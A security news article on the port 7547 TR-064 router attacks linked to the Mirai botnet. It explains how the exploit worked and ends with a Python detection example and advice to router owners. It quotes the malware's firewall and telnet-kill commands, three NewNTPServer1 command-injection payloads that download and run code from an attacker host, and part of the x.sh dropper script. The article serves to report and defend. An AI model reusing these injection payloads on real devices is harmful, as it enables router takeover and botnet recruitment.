Cybercriminals have begun attacking certain models of routers with port 7547 open. Some of them are using the infamous Mirai malware. This attack may affect millions of routers.
Port 7547 Routers
Routers issued by Deutsche Telekom and Eircom to German and Irish customers have already been identified as vulnerable. Routers from other manufacturers, such as Zyxel, Speedport, and others, also have weaknesses. These routers leave port 7547 open to connections from the internet.
The exploit uses this open port to send commands based on the TR-069 and TR-064 protocols. ISPs use these protocols to manage large fleets of customer hardware remotely. An advisory by the SANS Internet Storm Center said that honeypot servers posing as vulnerable routers were receiving exploit attempts every 5-10 minutes.
The Dean of Research at SANS, Johannes Ullrich, said that the exploits are most likely the cause of an outage affecting Deutsche Telekom customers over the weekend. DT officials said that 900,000 customers are vulnerable unless they reboot their routers and apply an emergency patch.
The Shodan search engine shows that 41 million devices have port 7547 open, and 5 million devices expose the TR-064 service to the internet. Indeed, these attacks started after researchers published code that exploits the TR-064 service. It’s included as a Metasploit module.
The code opens up port 80, which is the port that enables web browsing and remote administration. After that, routers with default or weak passwords can be remotely taken over and forced to become part of a botnet. Researchers from BadCyber examined some of the malicious computer code and found that the origin was from a Mirai command-and-control server.
In a blog post, the researchers wrote:
“The unusual application of TR-064 commands to execute code on routers has been described for the very first time at the beginning of November, and a few days later a relevant Metasploit module had appeared…”
To infect as many routers as possible, the exploit releases three separate files. Two target routers that run MIPS processors and the final one targets routers with ARM processors. After router infection, the attack closes port 7547 to prevent other cybercriminals from commandeering the devices.
To achieve this, the malware executes the following two commands (the first adds a firewall rule dropping inbound TCP traffic to port 7547, the second kills the telnet daemon):
busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
busybox killall -9 telnetd
The first command closes port 7547, and the second one kills the telnet service, which makes it difficult for ISPs to update the router remotely. A couple of variants of the original attack are:
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh`</NewNTPServer1>
<NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1>
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>
One of the variants changes the download method from wget to TFTP, and the other one replaces the binary download with a script download. Part of the script – x.sh – looks like this:
#!/bin/sh
# https://www.instagram.com/p/bxI-TSk3p_/
cd /var/tmp
cd /tmp
rm -f *
wget http://l.ocalhost.host/1
busybox chmod a+x 1
chmod 777 1
./1
rm -f *
This is just part of the script, but you get the idea. Kaspersky researchers say that the command-and-control servers point to IP addresses belonging to the US military. In a blog post, the researchers say that the criminals are likely doing that to throw people off the trail, or just trolling.
“Since there is no Mirai related infrastructure behind this network range, the bots will not receive any further commands until the criminals behind this attack will change the DNS records again…”
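The injection above works because the router passes the NewNTPServer1 value of a TR-064 SetNTPServers request to a shell. The following added detection example (written for this article, not code from the researchers or any vendor) parses such a SOAP body and flags any NewNTPServer field whose value is not a plain hostname or IP address; the request builder, the placeholder domain example.invalid and the sample values are constructed.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# A legitimate NTP server value is a hostname or IPv4 address, or empty for an unused slot.
_HOST_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$"
)
# Shell metacharacters that never belong in a hostname: backticks, $( ), ; | & and redirections.
_SHELL_META_RE = re.compile(r"`|\$\(|[;|&<>]")


def setntp_request(server1: str) -> str:
    """Build a constructed TR-064 SetNTPServers SOAP request with the given NewNTPServer1."""
    return f"""<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>{escape(server1)}</NewNTPServer1>
      <NewNTPServer2></NewNTPServer2>
    </u:SetNTPServers>
  </s:Body>
</s:Envelope>"""


def ntp_server_fields(soap_body: str) -> list[tuple[str, str]]:
    """Return (tag, value) for every NewNTPServerN element in the request body."""
    root = ET.fromstring(soap_body)
    return [(el.tag, (el.text or "").strip()) for el in root.iter()
            if el.tag.startswith("NewNTPServer")]


def classify_value(value: str) -> str:
    """'ok' for a hostname/IP or empty slot, 'injection' if shell metacharacters are present,
    otherwise 'malformed' (e.g. a bare URL that still cannot be an NTP host)."""
    if value == "" or _HOST_RE.match(value):
        return "ok"
    if _SHELL_META_RE.search(value):
        return "injection"
    return "malformed"


def find_injection(soap_body: str) -> list[tuple[str, str]]:
    """Return the NewNTPServer fields carrying a command-injection payload."""
    return [(tag, value) for tag, value in ntp_server_fields(soap_body)
            if classify_value(value) == "injection"]


# Constructed samples: a benign request and one shaped like the payloads quoted above.
BENIGN = setntp_request("0.pool.ntp.org")
MALICIOUS = setntp_request("`cd /tmp;wget http://example.invalid/1;chmod 777 1;./1`")
```

Run against captured requests on port 7547 (or a honeypot's log), any non-empty result is a reason to block the source and check the device's firmware.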
Is My Port Open?
If you’re concerned about your router, you can visit the website IsMyPortOpen.com to see if your router has port 7547 open. It’s very easy to do and just requires a click of a button. Aside from that, make sure that your router’s password is secure, and disable any remote administration tools.